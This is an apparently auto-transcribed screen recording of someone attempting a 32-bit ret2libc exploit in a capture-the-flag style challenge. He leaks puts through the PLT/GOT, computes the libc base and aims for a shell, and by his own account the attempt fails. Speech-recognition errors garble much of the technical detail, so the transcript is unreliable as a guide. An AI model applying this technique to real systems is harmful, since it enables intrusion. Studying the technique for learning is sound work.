All right. >> So this may or may not work and so I might trashes video, but I just got it in my head that I finally understand what this write-up is trying to do. And so I, I totally want to give it a try because the technique they use is really, really clever. >> So basically what you're trying to do every time you run a program like this. >> So I want to do, sorry, I'm going to do thunder leap-frog, but it's actually called zip line. >> And any ideas that you call a whole bunch of functions and stuff and, and, and use those function calls to other things. >> But this person did something very, very clever and it taught me a whole lot, I think, but I haven't done it before, so I will just give it a try. >> This by first Sciences just recording from pawn. Import star equals elf. >> I don't think it's L equals self dot what? >> So this TO T and P L t. So this is what I wanted to mess with. >> These are the like the functions that are used from the library, the standard C library. >> And they have like a local offset. >> And so I wanted to say like put PLT equals that. >> And then they have like an address in the global offset library. >> So I'm gonna say put Game of Thrones equals that, right? >> And, and this guide helps you see it. So basically like when there's going to be a system call, the, there's like a basically a caching process use. >> They're not like loading the entire library in. What they do is they have this, this is the global offset table. And you can see that some of these addresses are like actual legitimate, you know, kinda see library addresses, but some of them are just the offsets inside the program itself. When it goes to do this look up, since it's not done the lookup before, it's going to do a quick run through whatever this is to adjust from the start main position to the puts position or, or whatever it is that it's going to lookup. So for a lot of these common functions, it's going to not load, it's not, it's not going to know the address of them until call time because it wants to randomize the address of this every time it runs in order to prevent people like us from getting a leg up. >> Ok, great. >> But if I can get a stack overflow, then I can get around that. Alright, if I can stack smashing around that. So, so this is going to be the address will, puts will be in that global offset favorite, which early on has like the bad address, but once it's been called, it'll have the good address. >> So so what this person did is they got the offset and then they make a call to the PLT function that's going to load it into the GO TO address. >> Then they go back to the beginning of the program and they call it. And I think if we do this right, we should leak the addresses puts in this thing, which means that this offset would you just look up on the internet will just be true. So I just wanted to like try that rape. >> So process zip line and I'm going to send line a times 22 plus what I think I want to put in the 32 address of the PLT. >> I'm not totally sure why I do know why this is going to be. I want to go there and this command is going to like load put into the GIT guy. Then in the way that 32-bit architectures, and this is the last video we did. And it's actually like what this leapfrogging One is about. And so we definitely didn't call me 32. I'm going to put the address I want to call next, then the address to go to after this, then the arguments to that address. So, so this will be at the end, I want to go to zip line. Oh, I didn't look up or I wonder if I can links search in here. >> How about I just type in S and ten? >> No, it doesn't look like search find. No. >> Okay, hold that thought. Let's dump this on k here, let's say, or a bin two minus S zip line See this is global local call. >> These are all the things you're supposed to be doing, which is clearly cut right around all of that, which is it's just super slick. >> So thank you, whoever you are, I think I think that's the address I want. >> I should probably also gets the zip point address. And then this is the when function address. Actually, I don't care about the when function because in order to get rid of function a, to do something, all these other objects and I'm, and I'm trying to avoid all that. >> Okay? >> So P dot send line a times three to the offset P32 PLT P32, this address. >> So that we'll be back to the beginning of main function. Then we'll put P32, put Geo Team. >> And I just want to send that required argument is to say, well that'll do so to start the process area circle. >> Okay, the output goes, that sets a new line. >> So I think, I think, I think I can now look up suite we had put got before, but now I bet it won't be different. >> It won't be different because that was like a lookup. Apriori says, great, I just have to figure out how to read the address. Maybe r that is the address. F7 T6 9004. That looks like an address. It's putting all sorts of stuff down here, I think. Some some four bytes of that is the address inputs. And it is now my job. So let's see what let's go get the right fine. You leak make Packer 32 Indian byte for byte value u 04. So the first four bytes. >> So oh, he's done it again. >> Let's try that again. >> Sin line, I think what I'll do is receive one. >> Okay? >> And this is now different. What did I get before? Before I had the output to the semi-colon was the same, and then it's sort of been a little different. But the F7 F7, is that 1234? I think it looks like the F7 A6 before. It might be my winter. >> I don't know. >> I'm smart enough to figure that out without arena that I will be soon. Oh my gosh. >> Four through eight. >> Taiwan. There. >> Oh, well, maybe it is the first for any F7 goes the other way. And that's why they've got the Indian caterers. >> So what was the this is a poem. Tools function make packer 632 Indians. >> Little sign equals unsigned. >> Maybe G lib C start will equal o. >> I call that put offset, but I was totally wrong. That's the actual put address. >> Put offset is like just well-known. And and then that means that the call, so the Cisco or whatever, I could do whatever I want now. Okay, but I'll trust these two also visit us see factoids, settings that address as a call. It's going to be G c Start system offset and been SH as a thing will be G lib, C start plus finance, HR. >> And I'm like process should be running again. And so I think what I can do is put in a CIF address career-related, it don't think this should matter. I think this is just junk that goes here. Yes, correct. >> That is this followed by b ns h. All right. >> P dot interactive. >> I failed, I failed, I failed, but I failed. >> Oh, I know I failed. I read the wrong address. I'd like restarted all this stuff and no problem. >> No problem. >> Okay, so let's do this one more time. >> We're going to get this mother send line, put, put, put, put, do receive line will be the first line and then will receive it again. >> And we'll call this sleigh leaked address. >> And I think that address first four should be yep, there's my seven sets. I feel good about that. And then we had this like make on Packer, which we can do to address for four. So that is like put address equals that. And then, and then we had the G C start is put Address minus that. >> And then finally, this address is that in SH addresses that p that send line P0 that interactive. Oh, no, no. Okay. All right. All right. >> I'm going to copy and paste this will see some raw. >> I'm not sure what, but I do feel good about this business here. >> Yeah, these tools to find P equals process zip moraine, going okay with this system on my computer and on my computer and copy and pasting, it'll feel great about it said this doesn't feel right to me. Yeah. Well, okay. That's fine. >> We just define do all of these things. Yeah, that looks like an address way back there. >> Now, I think follow this directly and it didn't work. >> So I'll, I'll stop. I'll share my failed attempt here. Share my failed attempt and maybe somebody help me figure out where I should go do bedtime now and thanks. >> Ok.
Andy Novocin's Personal Meeting Room
From Andrew Novocin March 19, 2020
2 plays
2
0 comments
0
You unliked the media.